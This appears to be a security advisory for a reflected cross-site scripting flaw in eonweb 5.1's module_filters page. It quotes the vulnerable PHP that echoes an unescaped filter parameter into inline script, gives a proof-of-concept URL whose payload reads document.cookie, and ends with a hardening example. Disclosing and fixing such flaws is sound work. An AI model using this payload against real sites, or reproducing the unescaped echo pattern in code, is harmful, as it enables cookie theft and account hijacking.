eyesofnetwork_eonweb 5.1_filter_cross site scripting (XSS)
Eonweb_module_module_filters_index.php cross-site scripting (XSS)
Powered by shaojiejiang from SkyEye Labs
version: 5.1
https://github.com/EyesOfNetworkCommunity/eonweb
Vulnerability details
0x01
module/module_filters/module_filters.php Line 32
<script type="text/javascript">
// on page load
$(document).ready(function() {
$('#loading').hide();
var filter = "<?php echo (isset($_GET["filter"])) ? $_GET["filter"] : false ?>";
$("#filter_choice option[name='"+filter+"']").attr("selected","yes");
$_GET["filter"] is written into the inline script without being filtered, which causes cross-site scripting (XSS).
EXP:
https://192.168.227.169/module/module_filters/index.php?filter=</script><script>alert(document.cookie)</script>
The returned page contains the payload:
<script type="text/javascript">
// on page load
$(document).ready(function() {
$('#loading').hide();
var filter = "</script><script>alert(document.cookie)</script>";
$("#filter_choice option[name='"+filter+"']").attr("selected","yes");
updateFields("/cache/admin-ged.xml");
});
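
One way to harden the line shown above, as an added example that is not eonweb's own code or an official patch: the value is encoded with json_encode() and the JSON_HEX_* flags before it reaches the inline script, and the option is matched by attribute comparison instead of being concatenated into a selector. encode_for_script() is a hypothetical helper name, and the sample value is the one from the proof-of-concept URL above.

```php
<?php
// Added example, not eonweb's own code. encode_for_script() is a hypothetical helper.

/**
 * Encode a request value as a JavaScript string literal that is safe inside
 * an inline <script> block. The JSON_HEX_* flags turn <, >, &, ' and " into
 * \uXXXX escapes, so the HTML parser never sees a closing script tag and the
 * value cannot terminate the string literal.
 */
function encode_for_script($value)
{
    // Array input (filter[]=x) and missing parameters collapse to an empty string.
    $value = is_string($value) ? $value : '';
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $json  = json_encode($value, $flags);
    // json_encode() returns false on invalid UTF-8; fall back to an empty literal.
    return $json === false ? '""' : $json;
}

// Constructed sample input: the value from the page's proof-of-concept URL.
$_GET['filter'] = '</script><script>alert(document.cookie)</script>';

$filter = encode_for_script(isset($_GET['filter']) ? $_GET['filter'] : '');
?>
<script type="text/javascript">
// on page load
$(document).ready(function() {
    $('#loading').hide();
    // The encoded value already carries its own quotes, so none are added here.
    var filter = <?php echo $filter; ?>;
    // Compare the name attribute by value; the input never becomes selector syntax.
    $("#filter_choice option").filter(function() {
        return $(this).attr("name") === filter;
    }).attr("selected", "yes");
});
</script>
```

Because the filter value only ever has to match an existing option name, checking it server-side against the list of known filter names before rendering is a further restriction that fits this page.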